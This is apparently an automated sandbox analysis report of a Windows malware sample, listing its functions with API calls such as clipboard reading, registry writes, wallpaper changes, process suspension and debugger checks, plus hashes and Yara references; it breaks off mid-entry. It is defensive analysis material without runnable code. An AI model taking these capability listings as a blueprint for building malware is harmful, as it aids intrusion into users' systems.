                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 9a246007e106ae57227cd4fa2dc9241d70865749bb41c708d12fdd9bc8fa6ccf
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: 9a246007e106ae57227cd4fa2dc9241d70865749bb41c708d12fdd9bc8fa6ccf
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040B711
                                • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                • CloseClipboard.USER32 ref: 0040B725
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenSuspend
                                • String ID:
                                • API String ID: 1999457699-0
                                • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenResume
                                • String ID:
                                • API String ID: 3614150671-0
                                • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004461F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                                • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045332B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00453326,?,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
